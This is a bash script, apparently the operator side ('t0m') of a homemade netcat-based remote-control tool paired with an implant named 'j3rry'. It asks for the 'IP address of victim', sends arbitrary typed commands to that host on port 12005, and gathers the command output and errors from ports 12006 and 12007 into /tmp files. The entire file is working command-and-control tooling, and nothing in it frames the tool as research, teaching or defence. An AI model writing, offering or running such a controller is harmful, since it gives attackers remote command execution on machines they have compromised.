#!/bin/bash
echo "[S] T0m running"

echo -n "What is the IP address of victim?(localhost) :"
read ip
if [[ "$ip" == "" ]] ; then
	ip="localhost"
fi

outputport=12005 # sends commands to j3rry
inputport=12006 # receives output of the command executed on j3rry
errorport=12007 # receives error of the command executed on j3rry

inputfile="/tmp/t0m.inp" # stores inputport result
errorfile="/tmp/t0m.err" # stores errorport result

(touch "$inputfile" && echo "" > "$inputfile") || echo "[-] Could not set up $inputfile..."
(touch "$errorfile" && echo "" > "$errorfile") || echo "[-] Could not set up $errorfile..."

while :
do
	echo "[S] Options:"
	echo "[S] 	1 output a command to j3rry"
	echo "[S]	2 display previous command input from j3rry"
	echo "[S]	3 exit the program"

	read -p ":" usr
	
	if [ $usr -eq 3 ];then
		break

	elif [ $usr -eq 2 ]; then
		clear
		cat "$inputfile"	
		cat "$errorfile"

	elif [ $usr -eq 1 ]; then

		echo "[S] Please input the command you want to execute!"
		read -p "[S] :" command

		while : ; do
                        echo -n "Sending command..."
                        echo "$command" | nc "$ip" "$outputport"
                        if [ $? -eq 0 ]; then
                                echo "succeded!"
                                break
			else
                        	echo "failed! Resending in 2 seconds..."
                        	sleep 2

			fi
                done
		
		sleep 2 && pkill -P $$
		nc $ip "$inputport" > "$inputfile" &
		sleep 2 && pkill -P $$
		nc $ip "$errorport" > "$errorfile" &
		sleep 2 && pkill -P $$
	else
		echo "[S] Option inputted is invalid!"
	fi
done
echo "Closing t0m..."
rm -f "$inputfile"
rm -f "$errorfile"
pkill -P $$

exit 0

